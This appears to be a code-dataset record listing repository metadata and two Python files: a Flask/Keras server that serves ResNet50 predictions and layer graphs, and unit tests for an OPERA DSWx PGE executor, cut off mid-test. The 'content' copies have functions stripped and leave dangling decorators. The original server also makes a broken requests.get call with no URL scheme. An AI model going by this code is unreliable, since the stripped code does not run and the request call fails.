hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a1ea56f577e661c06c35585252ddea30eee3b5fd | 10,621 | py | Python | run_keras_server.py | DLVIsualizer/dlvis-flask | e1e22028b2d57fb894d105bd716437a3de8e4e7f | [
"MIT"
] | null | null | null | run_keras_server.py | DLVIsualizer/dlvis-flask | e1e22028b2d57fb894d105bd716437a3de8e4e7f | [
"MIT"
] | 13 | 2020-01-28T22:20:14.000Z | 2022-03-11T23:20:14.000Z | run_keras_server.py | DLVIsualizer/dlvis-flask | e1e22028b2d57fb894d105bd716437a3de8e4e7f | [
"MIT"
] | null | null | null | # # USAGE
# # Start the server:
# # python run_keras_server.py
# # Submit a request via cURL:
# # curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# # Submita a request via Python:
# # python simple_request.py
#
# # import the necessary packages
# from flask_cors import CORS, cross_origin
# from keras.applications import ResNet50
# from keras.applications import InceptionV3
# from keras.preprocessing.image import img_to_array
# from keras.applications import imagenet_utils
# from PIL import Image
# from constants import MODELS
# import numpy as np
# import flask
# import io
# import json
#
# # initialize our Flask application and the Keras model
# app = flask.Flask(__name__)
# cors = CORS(app)
#
# resnetModel = ResNet50(weights="imagenet")
# inceptionV3Model = InceptionV3(weights="imagenet")
#
# # def load_model():
# # load the pre-trained Keras model (here we are using a model
# # pre-trained on ImageNet and provided by Keras, but you can
# # substitute in your own networks just as easily)
# # global model
# # model = ResNet50(weights="imagenet")
#
# def prepare_image(image, target):
# # if the image mode is not RGB, convert it
# if image.mode != "RGB":
# image = image.convert("RGB")
#
# # resize the input image and preprocess it
# image = image.resize(target)
# image = img_to_array(image)
# image = np.expand_dims(image, axis=0)
# image = imagenet_utils.preprocess_input(image)
#
# # return the processed image
# return image
#
#
# def build_html_with_layer(layer):
# layer_class = layer['class_name']
# layer_config = layer['config']
# html = ""
#
# if layer_class == 'InputLayer':
# html = "input shape " + str(layer_config['batch_input_shape']) + "<br>"
# elif layer_class == 'ZeroPadding2D':
# html = "padding " + str(layer_config['padding']) + "<br>"
# elif layer_class == 'Conv2D':
# html = "filters " + str(layer_config['filters']) + "<br>" \
# "kernel size " + str(layer_config['kernel_size']) + "<br>" \
# "strides " + str(
# layer_config['strides']) + "<br>"
# elif layer_class == 'BatchNormalization':
# html = ""
# elif layer_class == 'Activation':
# html = "activation func</b> " + str(layer_config['activation'])
# elif layer_class == 'MaxPooling2D':
# html = "pool size " + str(layer_config['pool_size']) + "<br>" \
# "strides " + str(layer_config['strides']) + "<br>"
#
# return html
#
#
# def create_model_graph(layers):
# data = []
# tooltip = {}
# links = []
# for idx in range(1, len(layers)):
# links.append({
# "source": idx - 1,
# "target": idx
# })
#
# for idx, layer in enumerate(layers):
# flag = False
# prior_node = ""
#
# inbound_nodes = layer["inbound_nodes"]
#
# if len(inbound_nodes) != 0:
# for inbound_node in inbound_nodes[0]:
# if inbound_node[0] != data[len(data)-1]["name"]:
# flag = True
# prior_node = inbound_node[0]
# break
# else:
# break
#
# if flag is True:
# for d in data:
# if d["name"] == prior_node:
# data.append({
# "name": layer['name'],
# "x": d["x"] + 1200,
# "y": d["y"],
# "value": layer['class_name']
# })
# else:
# data.append({
# "name": layer['name'],
# "x": 500,
# "y": idx * 200,
# "value": layer['class_name']
# })
#
# tooltip[layer['name']] = build_html_with_layer(layer)
#
#
#
# model_graph = {
# "graph": {
# "data": data,
# "links": links
# },
# "tooltip": tooltip
# }
#
# return model_graph
#
#
# @app.route("/predict", methods=["POST"])
# def predict():
# # initialize the data dictionary that will be returned from the
# # view
# data = {"success": False}
#
# # ensure an image was properly uploaded to our endpoint
# if flask.request.method == "POST":
# if flask.request.files.get("image"):
# # read the image in PIL format
# image = flask.request.files["image"].read()
# image = Image.open(io.BytesIO(image))
#
# # preprocess the image and prepare it for classification
# image = prepare_image(image, target=(224, 224))
#
# # classify the input image and then initialize the list
# # of predictions to return to the client
# preds = resnetModel.predict(image)
# results = imagenet_utils.decode_predictions(preds)
# data["predictions"] = []
#
# # loop over the results and add them to the list of
# # returned predictions
# for (imagenetID, label, prob) in results[0]:
# r = {"label": label, "probability": float(prob)}
# data["predictions"].append(r)
#
# # indicate that the request was a success
# data["success"] = True
#
# # return the data dictionary as a JSON response
# return flask.jsonify(data)
#
#
# @app.route("/layers/<int:model_id>", methods=["GET"])
# @cross_origin()
# def layers(model_id):
#
# if model_id == MODELS['ResNet50']:
# jmodel = json.loads(resnetModel.to_json())
# elif model_id == MODELS['InceptionV3']:
# jmodel = json.loads(inceptionV3Model.to_json())
# else:
# return ('',204) # No Content
#
# layers = jmodel["config"]["layers"]
#
# # print(json.dumps(layers, indent=2, sort_keys=True))
#
# model_graph = create_model_graph(layers)
# # print(json.dumps(model_graph, indent=2, sort_keys=True))
# return flask.jsonify(model_graph)
#
#
# # if this is the main thread of execution first load the model and
# # then start the server
# if __name__ == "__main__":
# print(("* Loading Keras model and Flask starting server..."
# "please wait until server has fully started"))
# app.run()
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# Submita a request via Python:
# python simple_request.py
# import the necessary packages
from flask_cors import CORS, cross_origin
from constants import MODELS
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.preprocessing.image import img_to_array
from keras.applications import imagenet_utils
from PIL import Image
import numpy as np
import flask
import io
import json
import requests
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
cors = CORS(app)
# PBW: 0505_18
MODEL_ID_RESNET = 'ResNet50'
MODEL_ID_INCEPTIONV3 = 'InceptionV3'
currentModel = 0 # model pointer
resnetModel = ResNet50(weights="imagenet")
inceptionV3Model = InceptionV3(weights="imagenet")
# def load_model():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
# global model
# model = ResNet50(weights="imagenet")
@app.route("/predict", methods=["POST"])
@app.route("/layers/<int:model_id>", methods=["GET"])
@cross_origin()
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
print(("* Loading Keras model and Flask starting server..."
"please wait until server has fully started"))
app.run() | 28.940054 | 124 | 0.654364 | # # USAGE
# # Start the server:
# # python run_keras_server.py
# # Submit a request via cURL:
# # curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# # Submita a request via Python:
# # python simple_request.py
#
# # import the necessary packages
# from flask_cors import CORS, cross_origin
# from keras.applications import ResNet50
# from keras.applications import InceptionV3
# from keras.preprocessing.image import img_to_array
# from keras.applications import imagenet_utils
# from PIL import Image
# from constants import MODELS
# import numpy as np
# import flask
# import io
# import json
#
# # initialize our Flask application and the Keras model
# app = flask.Flask(__name__)
# cors = CORS(app)
#
# resnetModel = ResNet50(weights="imagenet")
# inceptionV3Model = InceptionV3(weights="imagenet")
#
# # def load_model():
# # load the pre-trained Keras model (here we are using a model
# # pre-trained on ImageNet and provided by Keras, but you can
# # substitute in your own networks just as easily)
# # global model
# # model = ResNet50(weights="imagenet")
#
# def prepare_image(image, target):
# # if the image mode is not RGB, convert it
# if image.mode != "RGB":
# image = image.convert("RGB")
#
# # resize the input image and preprocess it
# image = image.resize(target)
# image = img_to_array(image)
# image = np.expand_dims(image, axis=0)
# image = imagenet_utils.preprocess_input(image)
#
# # return the processed image
# return image
#
#
# def build_html_with_layer(layer):
# layer_class = layer['class_name']
# layer_config = layer['config']
# html = ""
#
# if layer_class == 'InputLayer':
# html = "input shape " + str(layer_config['batch_input_shape']) + "<br>"
# elif layer_class == 'ZeroPadding2D':
# html = "padding " + str(layer_config['padding']) + "<br>"
# elif layer_class == 'Conv2D':
# html = "filters " + str(layer_config['filters']) + "<br>" \
# "kernel size " + str(layer_config['kernel_size']) + "<br>" \
# "strides " + str(
# layer_config['strides']) + "<br>"
# elif layer_class == 'BatchNormalization':
# html = ""
# elif layer_class == 'Activation':
# html = "activation func</b> " + str(layer_config['activation'])
# elif layer_class == 'MaxPooling2D':
# html = "pool size " + str(layer_config['pool_size']) + "<br>" \
# "strides " + str(layer_config['strides']) + "<br>"
#
# return html
#
#
# def create_model_graph(layers):
# data = []
# tooltip = {}
# links = []
# for idx in range(1, len(layers)):
# links.append({
# "source": idx - 1,
# "target": idx
# })
#
# for idx, layer in enumerate(layers):
# flag = False
# prior_node = ""
#
# inbound_nodes = layer["inbound_nodes"]
#
# if len(inbound_nodes) != 0:
# for inbound_node in inbound_nodes[0]:
# if inbound_node[0] != data[len(data)-1]["name"]:
# flag = True
# prior_node = inbound_node[0]
# break
# else:
# break
#
# if flag is True:
# for d in data:
# if d["name"] == prior_node:
# data.append({
# "name": layer['name'],
# "x": d["x"] + 1200,
# "y": d["y"],
# "value": layer['class_name']
# })
# else:
# data.append({
# "name": layer['name'],
# "x": 500,
# "y": idx * 200,
# "value": layer['class_name']
# })
#
# tooltip[layer['name']] = build_html_with_layer(layer)
#
#
#
# model_graph = {
# "graph": {
# "data": data,
# "links": links
# },
# "tooltip": tooltip
# }
#
# return model_graph
#
#
# @app.route("/predict", methods=["POST"])
# def predict():
# # initialize the data dictionary that will be returned from the
# # view
# data = {"success": False}
#
# # ensure an image was properly uploaded to our endpoint
# if flask.request.method == "POST":
# if flask.request.files.get("image"):
# # read the image in PIL format
# image = flask.request.files["image"].read()
# image = Image.open(io.BytesIO(image))
#
# # preprocess the image and prepare it for classification
# image = prepare_image(image, target=(224, 224))
#
# # classify the input image and then initialize the list
# # of predictions to return to the client
# preds = resnetModel.predict(image)
# results = imagenet_utils.decode_predictions(preds)
# data["predictions"] = []
#
# # loop over the results and add them to the list of
# # returned predictions
# for (imagenetID, label, prob) in results[0]:
# r = {"label": label, "probability": float(prob)}
# data["predictions"].append(r)
#
# # indicate that the request was a success
# data["success"] = True
#
# # return the data dictionary as a JSON response
# return flask.jsonify(data)
#
#
# @app.route("/layers/<int:model_id>", methods=["GET"])
# @cross_origin()
# def layers(model_id):
#
# if model_id == MODELS['ResNet50']:
# jmodel = json.loads(resnetModel.to_json())
# elif model_id == MODELS['InceptionV3']:
# jmodel = json.loads(inceptionV3Model.to_json())
# else:
# return ('',204) # No Content
#
# layers = jmodel["config"]["layers"]
#
# # print(json.dumps(layers, indent=2, sort_keys=True))
#
# model_graph = create_model_graph(layers)
# # print(json.dumps(model_graph, indent=2, sort_keys=True))
# return flask.jsonify(model_graph)
#
#
# # if this is the main thread of execution first load the model and
# # then start the server
# if __name__ == "__main__":
# print(("* Loading Keras model and Flask starting server..."
# "please wait until server has fully started"))
# app.run()
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# Submita a request via Python:
# python simple_request.py
# import the necessary packages
from flask_cors import CORS, cross_origin
from constants import MODELS
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.preprocessing.image import img_to_array
from keras.applications import imagenet_utils
from PIL import Image
import numpy as np
import flask
import io
import json
import requests
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
cors = CORS(app)
# PBW: 0505_18
MODEL_ID_RESNET = 'ResNet50'
MODEL_ID_INCEPTIONV3 = 'InceptionV3'
currentModel = 0 # model pointer
resnetModel = ResNet50(weights="imagenet")
inceptionV3Model = InceptionV3(weights="imagenet")
# def load_model():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
# global model
# model = ResNet50(weights="imagenet")
def prepare_image(image, target):
# if the image mode is not RGB, convert it
if image.mode != "RGB":
image = image.convert("RGB")
# resize the input image and preprocess it
image = image.resize(target)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image = imagenet_utils.preprocess_input(image)
# return the processed image
return image
def build_html_with_layer(layer):
layer_class = layer['class_name']
layer_config = layer['config']
html = ""
print(json.dumps(layer_config, indent=2, sort_keys=True))
if layer_class == 'InputLayer':
html = "input shape " + str(layer_config['batch_input_shape']) + "<br>"
elif layer_class == 'ZeroPadding2D':
html = "padding " + str(layer_config['padding']) + "<br>"
elif layer_class == 'Conv2D':
html = "filters " + str(layer_config['filters']) + "<br>" \
"kernel size " + str(layer_config['kernel_size']) + "<br>" \
"strides " + str(
layer_config['strides']) + "<br>"
elif layer_class == 'BatchNormalization':
html = ""
elif layer_class == 'Activation':
html = "activation func</b> " + str(layer_config['activation'])
elif layer_class == 'MaxPooling2D':
html = "pool size " + str(layer_config['pool_size']) + "<br>" \
"strides " + str(layer_config['strides']) + "<br>"
return html
def create_model_graph(layers):
data = []
tooltip = {}
for idx, layer in enumerate(layers):
data.append({
"name": layer['name'],
"x": 500,
"y": idx * 200,
"value": layer['class_name']
})
tooltip[layer['name']] = build_html_with_layer(layer)
links = []
for idx in range(1, len(layers)):
links.append({
"source": idx - 1,
"target": idx
})
model_graph = {
"graph": {
"data": data,
"links": links
},
"tooltip": tooltip
}
return model_graph
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
data = {"success": False}
# ensure an image was properly uploaded to our endpoint
if flask.request.method == "POST":
if flask.request.files.get("image"):
# read the image in PIL format
image = flask.request.files["image"].read()
image = Image.open(io.BytesIO(image))
# preprocess the image and prepare it for classification
image = prepare_image(image, target=(224, 224))
# classify the input image and then initialize the list
# of predictions to return to the client
preds = resnetModel.predict(image)
results = imagenet_utils.decode_predictions(preds)
data["predictions"] = []
# loop over the results and add them to the list of
# returned predictions
for (imagenetID, label, prob) in results[0]:
r = {"label": label, "probability": float(prob)}
data["predictions"].append(r)
# indicate that the request was a success
data["success"] = True
# return the data dictionary as a JSON response
return flask.jsonify(data)
@app.route("/layers/<int:model_id>", methods=["GET"])
@cross_origin()
def layers(model_id):
if model_id == MODELS['ResNet50']:
jmodel = json.loads(resnetModel.to_json())
elif model_id == MODELS['InceptionV3']:
jmodel = json.loads(inceptionV3Model.to_json())
else:
return ('',204) # No Content
jmodel = requests.get('127.0.0.1:5001')
layers = jmodel["config"]["layers"]
# print(json.dumps(layers, indent=2, sort_keys=True))
model_graph = create_model_graph(layers)
# print(json.dumps(model_graph, indent=2, sort_keys=True))
return flask.jsonify(model_graph)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
print(("* Loading Keras model and Flask starting server..."
"please wait until server has fully started"))
app.run() | 3,302 | 0 | 113 |
0772436cb9af65982f99dcfc7bcb93f6712d13ce | 11,335 | py | Python | src/opera/test/pge/test_dswx_pge.py | drewmee/opera-sds-pge | ab6e1a9d872a72b74d5b9c096ab788809f76d32d | [
"Apache-2.0"
] | null | null | null | src/opera/test/pge/test_dswx_pge.py | drewmee/opera-sds-pge | ab6e1a9d872a72b74d5b9c096ab788809f76d32d | [
"Apache-2.0"
] | null | null | null | src/opera/test/pge/test_dswx_pge.py | drewmee/opera-sds-pge | ab6e1a9d872a72b74d5b9c096ab788809f76d32d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright 2021, by the California Institute of Technology.
# ALL RIGHTS RESERVED.
# United States Government sponsorship acknowledged.
# Any commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
# This software may be subject to U.S. export control laws and regulations.
# By accepting this document, the user agrees to comply with all applicable
# U.S. export laws and regulations. User has the responsibility to obtain
# export licenses, or other export authority as may be required, before
# exporting such information to foreign countries or providing access to
# foreign persons.
#
"""
================
test_dswx_pge.py
================
Unit tests for the pge/dswx_pge.py module.
"""
import os
import tempfile
import unittest
from io import StringIO
from os.path import abspath, join
from pkg_resources import resource_filename
import yaml
from opera.pge import DSWxExecutor, RunConfig
from opera.util import PgeLogger
class DSWxPgeTestCase(unittest.TestCase):
"""Base test class using unittest"""
starting_dir = None
working_dir = None
test_dir = None
input_file = None
@classmethod
def setUpClass(cls) -> None:
"""Set up directories and files for testing"""
cls.starting_dir = abspath(os.curdir)
cls.test_dir = resource_filename(__name__, "")
cls.data_dir = join(cls.test_dir, "data")
os.chdir(cls.test_dir)
cls.working_dir = tempfile.TemporaryDirectory(
prefix="test_dswx_pge_", suffix='_temp', dir=os.curdir
)
# Create the input dir expected by the test RunConfig and add a dummy
# input file for validation
input_dir = join(cls.working_dir.name, "dswx_pge_test/input_dir")
os.makedirs(input_dir, exist_ok=True)
cls.input_file = tempfile.NamedTemporaryFile(
dir=input_dir, prefix="test_input", suffix=".tif")
@classmethod
def tearDownClass(cls) -> None:
"""At completion re-establish starting directory"""
cls.input_file.close()
cls.working_dir.cleanup()
os.chdir(cls.starting_dir)
def setUp(self) -> None:
"""Use the temporary directory as the working directory"""
os.chdir(self.working_dir.name)
def tearDown(self) -> None:
"""Return to starting directory"""
os.chdir(self.test_dir)
def test_dswx_pge_execution(self):
"""
Test execution of the DSWxExecutor class and its associated mixins using
a test RunConfig that creates a dummy expected output file and logs a
message to be captured by PgeLogger.
"""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=runconfig_path)
# Check that basic attributes were initialized
self.assertEqual(pge.name, "DSWx")
self.assertEqual(pge.pge_name, "DSWxPgeTest")
self.assertEqual(pge.runconfig_path, runconfig_path)
# Check that other objects have not been instantiated yet
self.assertIsNone(pge.runconfig)
self.assertIsNone(pge.logger)
# Kickoff execution of DSWx PGE
pge.run()
# Check that the runconfig and logger were instantiated
self.assertIsInstance(pge.runconfig, RunConfig)
self.assertIsInstance(pge.logger, PgeLogger)
# Check that directories were created according to RunConfig
self.assertTrue(os.path.isdir(pge.runconfig.output_product_path))
self.assertTrue(os.path.isdir(pge.runconfig.scratch_path))
# Check that a in-memory log was created
stream = pge.logger.get_stream_object()
self.assertTrue(isinstance(stream, StringIO))
# Check that a RunConfig for the SAS was isolated within the scratch directory
expected_sas_config_file = join(pge.runconfig.scratch_path, 'test_dswx_hls_config_sas.yaml')
self.assertTrue(os.path.exists(expected_sas_config_file))
# Check that the log file was created and moved into the output directory
expected_log_file = join(pge.runconfig.output_product_path, pge.logger.get_file_name())
self.assertTrue(os.path.exists(expected_log_file))
# Open and read the log
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"DSWx-HLS invoked with RunConfig {expected_sas_config_file}", log_contents)
def test_dswx_pge_input_validation(self):
"""Test the input validation checks made by DSWxPreProcessorMixin."""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
with open(runconfig_path, 'r', encoding='utf-8') as stream:
runconfig_dict = yaml.safe_load(stream)
input_files_group = runconfig_dict['RunConfig']['Groups']['PGE']['InputFilesGroup']
# Test that a non-existent file is detected by pre-processor
input_files_group['InputFilePaths'] = ['non_existent_file.tif']
with open(test_runconfig_path, 'w', encoding='utf-8') as input_path:
yaml.safe_dump(runconfig_dict, input_path, sort_keys=False)
try:
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
# Config validation occurs before the log is fully initialized, but the
# initial log file should still exist and contain details of the validation
# error
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
# Open the log file, and check that the validation error details were captured
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Could not locate specified input file/directory "
f"{abspath('non_existent_file.tif')}", log_contents)
# Test that an input directory with no .tif files is caught
input_files_group['InputFilePaths'] = ['dswx_pge_test/scratch_dir']
with open(test_runconfig_path, 'w', encoding='utf-8') as out_file:
yaml.safe_dump(runconfig_dict, out_file, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Input directory {abspath('dswx_pge_test/scratch_dir')} "
f"does not contain any tif files", log_contents)
# Lastly, check that a file that exists but is not a tif is caught
input_files_group['InputFilePaths'] = [runconfig_path]
with open(test_runconfig_path, 'w', encoding='utf-8') as runconfig_fh:
yaml.safe_dump(runconfig_dict, runconfig_fh, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Input file {abspath(runconfig_path)} does not have "
f".tif extension", log_contents)
finally:
if os.path.exists(test_runconfig_path):
os.unlink(test_runconfig_path)
def test_dswx_pge_output_validation(self):
"""Test the output validation checks made by DSWxPostProcessorMixin."""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
with open(runconfig_path, 'r', encoding='utf-8') as stream:
runconfig_dict = yaml.safe_load(stream)
product_path_group = runconfig_dict['RunConfig']['Groups']['PGE']['ProductPathGroup']
primary_executable_group = runconfig_dict['RunConfig']['Groups']['PGE']['PrimaryExecutable']
# Test with a SAS command that does not produce any output file,
# post-processor should detect that expected output is missing
product_path_group['SASOutputFile'] = 'missing_dswx_hls.tif'
primary_executable_group['ProgramPath'] = 'echo'
primary_executable_group['ProgramOptions'] = ['hello world']
with open(test_runconfig_path, 'w', encoding='utf-8') as config_fh:
yaml.safe_dump(runconfig_dict, config_fh, sort_keys=False)
try:
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_output_file = 'dswx_pge_test/output_dir/missing_dswx_hls.tif'
self.assertFalse(os.path.exists(expected_output_file))
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Expected SAS output file {abspath(expected_output_file)} "
f"does not exist", log_contents)
# Test with a SAS command that produces the expected output file, but
# one that is empty (size 0 bytes). Post-processor should detect this
# and flag an error
product_path_group['SASOutputFile'] = 'empty_dswx_hls.tif'
primary_executable_group['ProgramPath'] = 'touch'
primary_executable_group['ProgramOptions'] = ['dswx_pge_test/output_dir/empty_dswx_hls.tif']
with open(test_runconfig_path, 'w', encoding='utf-8') as outfile:
yaml.safe_dump(runconfig_dict, outfile, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_output_file = 'dswx_pge_test/output_dir/empty_dswx_hls.tif'
self.assertTrue(os.path.exists(expected_output_file))
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"SAS output file {abspath(expected_output_file)} was "
f"created but is empty", log_contents)
finally:
if os.path.exists(test_runconfig_path):
os.unlink(test_runconfig_path)
if __name__ == "__main__":
unittest.main()
| 40.62724 | 104 | 0.66749 | #!/usr/bin/env python3
#
# Copyright 2021, by the California Institute of Technology.
# ALL RIGHTS RESERVED.
# United States Government sponsorship acknowledged.
# Any commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
# This software may be subject to U.S. export control laws and regulations.
# By accepting this document, the user agrees to comply with all applicable
# U.S. export laws and regulations. User has the responsibility to obtain
# export licenses, or other export authority as may be required, before
# exporting such information to foreign countries or providing access to
# foreign persons.
#
"""
================
test_dswx_pge.py
================
Unit tests for the pge/dswx_pge.py module.
"""
import os
import tempfile
import unittest
from io import StringIO
from os.path import abspath, join
from pkg_resources import resource_filename
import yaml
from opera.pge import DSWxExecutor, RunConfig
from opera.util import PgeLogger
class DSWxPgeTestCase(unittest.TestCase):
"""Base test class using unittest"""
starting_dir = None
working_dir = None
test_dir = None
input_file = None
@classmethod
def setUpClass(cls) -> None:
"""Set up directories and files for testing"""
cls.starting_dir = abspath(os.curdir)
cls.test_dir = resource_filename(__name__, "")
cls.data_dir = join(cls.test_dir, "data")
os.chdir(cls.test_dir)
cls.working_dir = tempfile.TemporaryDirectory(
prefix="test_dswx_pge_", suffix='_temp', dir=os.curdir
)
# Create the input dir expected by the test RunConfig and add a dummy
# input file for validation
input_dir = join(cls.working_dir.name, "dswx_pge_test/input_dir")
os.makedirs(input_dir, exist_ok=True)
cls.input_file = tempfile.NamedTemporaryFile(
dir=input_dir, prefix="test_input", suffix=".tif")
@classmethod
def tearDownClass(cls) -> None:
"""At completion re-establish starting directory"""
cls.input_file.close()
cls.working_dir.cleanup()
os.chdir(cls.starting_dir)
def setUp(self) -> None:
"""Use the temporary directory as the working directory"""
os.chdir(self.working_dir.name)
def tearDown(self) -> None:
"""Return to starting directory"""
os.chdir(self.test_dir)
def test_dswx_pge_execution(self):
"""
Test execution of the DSWxExecutor class and its associated mixins using
a test RunConfig that creates a dummy expected output file and logs a
message to be captured by PgeLogger.
"""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=runconfig_path)
# Check that basic attributes were initialized
self.assertEqual(pge.name, "DSWx")
self.assertEqual(pge.pge_name, "DSWxPgeTest")
self.assertEqual(pge.runconfig_path, runconfig_path)
# Check that other objects have not been instantiated yet
self.assertIsNone(pge.runconfig)
self.assertIsNone(pge.logger)
# Kickoff execution of DSWx PGE
pge.run()
# Check that the runconfig and logger were instantiated
self.assertIsInstance(pge.runconfig, RunConfig)
self.assertIsInstance(pge.logger, PgeLogger)
# Check that directories were created according to RunConfig
self.assertTrue(os.path.isdir(pge.runconfig.output_product_path))
self.assertTrue(os.path.isdir(pge.runconfig.scratch_path))
# Check that a in-memory log was created
stream = pge.logger.get_stream_object()
self.assertTrue(isinstance(stream, StringIO))
# Check that a RunConfig for the SAS was isolated within the scratch directory
expected_sas_config_file = join(pge.runconfig.scratch_path, 'test_dswx_hls_config_sas.yaml')
self.assertTrue(os.path.exists(expected_sas_config_file))
# Check that the log file was created and moved into the output directory
expected_log_file = join(pge.runconfig.output_product_path, pge.logger.get_file_name())
self.assertTrue(os.path.exists(expected_log_file))
# Open and read the log
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"DSWx-HLS invoked with RunConfig {expected_sas_config_file}", log_contents)
def test_dswx_pge_input_validation(self):
    """Test the input validation checks made by DSWxPreProcessorMixin.

    Exercises three failure modes: a missing input file, an input directory
    containing no .tif files, and an existing input file without a .tif
    extension.  Each is expected to raise RuntimeError from run() and leave
    the validation details in the (partially initialized) log file.
    """
    runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
    test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
    with open(runconfig_path, 'r', encoding='utf-8') as stream:
        runconfig_dict = yaml.safe_load(stream)
    input_files_group = runconfig_dict['RunConfig']['Groups']['PGE']['InputFilesGroup']
    # Test that a non-existent file is detected by pre-processor
    input_files_group['InputFilePaths'] = ['non_existent_file.tif']
    with open(test_runconfig_path, 'w', encoding='utf-8') as input_path:
        yaml.safe_dump(runconfig_dict, input_path, sort_keys=False)
    try:
        pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
        with self.assertRaises(RuntimeError):
            pge.run()
        # Config validation occurs before the log is fully initialized, but the
        # initial log file should still exist and contain details of the validation
        # error
        expected_log_file = pge.logger.get_file_name()
        self.assertTrue(os.path.exists(expected_log_file))
        # Open the log file, and check that the validation error details were captured
        with open(expected_log_file, 'r', encoding='utf-8') as infile:
            log_contents = infile.read()
        self.assertIn(f"Could not locate specified input file/directory "
                      f"{abspath('non_existent_file.tif')}", log_contents)
        # Test that an input directory with no .tif files is caught
        input_files_group['InputFilePaths'] = ['dswx_pge_test/scratch_dir']
        with open(test_runconfig_path, 'w', encoding='utf-8') as out_file:
            yaml.safe_dump(runconfig_dict, out_file, sort_keys=False)
        pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
        with self.assertRaises(RuntimeError):
            pge.run()
        expected_log_file = pge.logger.get_file_name()
        self.assertTrue(os.path.exists(expected_log_file))
